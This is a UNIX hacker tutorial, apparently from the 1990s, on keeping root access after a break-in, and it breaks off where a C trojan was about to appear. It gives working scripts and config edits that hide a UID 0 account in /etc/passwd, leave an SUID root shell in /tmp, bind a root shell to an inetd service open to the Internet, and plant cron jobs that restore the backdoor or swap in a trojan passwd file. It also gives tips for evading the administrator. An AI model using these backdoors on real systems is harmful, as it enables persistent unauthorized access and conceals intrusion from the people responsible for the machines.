Ok..... You've been at it for all night. Trying all the exploits you can think of. The system seems tight. The system looks tight.The system *is* tight. You've tried everything. Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrectpermissions, race conditions, SUID exploits, Sendmail bugs, and so on... Nothing. WAIT! What's that!?!? A "#" ???? Finally!After seeming endless toiling, you've managed to steal root. Now what? How do you hold onto this precious super-userprivilege you have worked so hard to achieve....? This article is intended to show you how to hold onto root once you have it. It is intended for hackers and administrators alike.From a hacking perspective, it is obvious what good this paper will do you. Admin's can likewise benefit from this paper. Everwonder how that pesky hacker always manages to pop up, even when you think you've completely eradicated him from yoursystem?This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there areways into one. BeforehandKnow the location of critical system files. This should be obvious (If you can't list any of the top of your head, stop readingnow, get a book on UNIX, read it, then come back to me...). Familiarity with passwd file formats (including general 7 fieldformat, system specific naming conventions, shadowing mechanisms, etc...). Know vi. Many systems will not have thoserobust, user-friendly editors such as Pico and Emacs. Vi is also quite useful for needing to quickly seach and edit a large file. Ifyou are connecting remotely (via dial-up/telnet/rlogin/whatver) it's always nice to have a robust terminal program that has anice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc...The permenance of these backdoors will depend completely on the technical saavy of the administrator. The experienced andskilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely theadmin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some timeto come. One major thing to be aware of, is the fact that if you can cover you tracks during the initial break-in, no one will belooking for back doors.The Overt[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of rentry. Itflies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simplyprepend or append it. Anyone causally examining the passwd file will see this. So, why not stick it in the middle... #!/bin/csh# Inserts a UID 0 account into the middle of the passwd file.# There is likely a way to do this in 1/2 a line of AWK or SED.  Oh well.# daemon9@netcom.comset linecount = `wc -l /etc/passwd`cd                                      # Do this at home.cp /etc/passwd ./temppass               # Safety first.echo passwd file has $linecount[1] lines.@ linecount[1] /= 2@ linecount[1] += 1                     # we only want 2 temp filesecho Creating two files, $linecount[1] lines each \(or approximately that\).split -$linecount[1] ./temppass         # passwd string optionalecho "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaacat ./xab >> ./xaamv ./xaa /etc/passwdchmod 644 /etc/passwd                   # or whatever it was beforehandrm ./xa* ./temppassecho Done...NEVER, EVER, change the root password. The reasons are obvious. [2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somwhere buried deep in thepasswd file has been abandoned, and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the secondfield). [3] Leave an SUID root shell in /tmp. #!/bin/sh# Everyone's favorite...cp /bin/csh /tmp/.evilnaughtyshell      # Don't name it that...chmod 4755 /tmp/.evilnaughtyshellMany systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mountedto disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people maynotice...but, hey, this *is* the overt section....). I will not detail the changes neccessary because they can be quite systemspecific. Check out /var/spool/cron/crontabs/root and /etc/fstab. The Veiled[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, somebackground info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns theappropriate program (usally a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typicallines look like this:(1)     (2)     (3)     (4)     (5)     (6)             (7)ftp     stream  tcp     nowait  root    /usr/etc/ftpd   ftpdtalk    dgram   udp     wait    root    /usr/etc/ntalkd ntalkdField (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determinewhich port it should associate the program name with. (2) tells inetd which type of socket connection the daemon will expect.TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field which is either of the two transport protocols, TCPor UDP. Field (4) specifies whether or not the daemon is iterative or concurrent. A 'wait' flag indicates that the server willprocess a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn achild process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or moreinportantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actualcommand (and optional arguments). If the program is trivial (usally requiring no user interaction) inetd may handle it internally.This is done with an 'internal' flag in fields (6) and (7).So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle itwith something else. A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwdfile, etc...For the insinuation-impaired, try this: Open the /etc/inetd.conf in an available editor. Find the line that reads:                 daytime stream  tcp     nowait  root    internaland change it to:         daytime stream  tcp     nowait /bin/sh  sh -i.  You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill andrestart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interuppt ALL network connections (so it is a good ideato do this off peak hours).[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice. Onesimple solution is to set up a shell the runs similar to the above backdoor. You need to make sure the entry appears in/etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple: (1)       (2)/(3)          (4)smtp      25/tcp           mail    Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common nameassociated with the service. For instance, add this line to /etc/services:        evil    22/tcp          eviland this line to /etc/inetd.conf:         evil    stream  tcp     nowait  /bin/sh sh -iRestart inetd as before. Note: Potentially, these are a VERY powerful backdoors. They not only offer local rentry from any account on the system,they offer rentry from *any* account on *any* computer on the Internet. [6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root'scrontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), thisbackdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usally located. Here, you haveseveral options. I will list a only few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon.It is a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove,or view your crontab entries. It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab. A crontabentry has six fields:(1)     (2)     (3)     (4)     (5)     (6) 0       0       *       *       1       /usr/bin/updatedb      Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week(0-6). Field (6) is the command (or shell script) to execute. The above shell script is executed on Mondays. To exploit cron,simply add an entry into /var/spool/crontab/root. For example: You can have a cronjob that will run daily and look in the/etc/passwd file for the UID 0 account we previously added, and add him if he is missing, or do nothing otherwise (it may notbe a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate yourshady intentions). Add this line to /var/spool/crontab/root:         0       0       *       *       *       /usr/bin/trojancodeThis is the shell script: #!/bin/csh# Is our eviluser still on the system?  Let's make sure he is.#daemon9@netcom.comset evilflag = (`grep eviluser /etc/passwd`)    if($#evilflag == 0) then                        # Is he there?                set linecount = `wc -l /etc/passwd`        cd                                      # Do this at home.        cp /etc/passwd ./temppass               # Safety first.        @ linecount[1] /= 2        @ linecount[1] += 1                     # we only want 2 temp files        split -$linecount[1] ./temppass         # passwd string optional        echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa        cat ./xab >> ./xaa        mv ./xaa /etc/passwd        chmod 644 /etc/passwd                   # or whatever it was beforehand        rm ./xa* ./temppass        echo Done...elseendif   [7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the/etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a rootaccount with a passwd of your choosing. We run a cronjob that will, every morning at 2:30am (or every other morning), save acopy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!).Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everythingwould be ok. Add this line to root's crontab file:        29      2       *       *       *       /bin/usr/sneakysneaky_passwdmake sure this exists: #echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.sneakyand this is the simple shell script: #!/bin/csh# Install trojan /etc/passwd file for one minute#daemon9@netcom.comcp /etc/passwd /etc/.temppasscp /var/spool/mail/.sneaky /etc/passwdsleep 60mv /etc/.temppass /etc/passwd[8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is.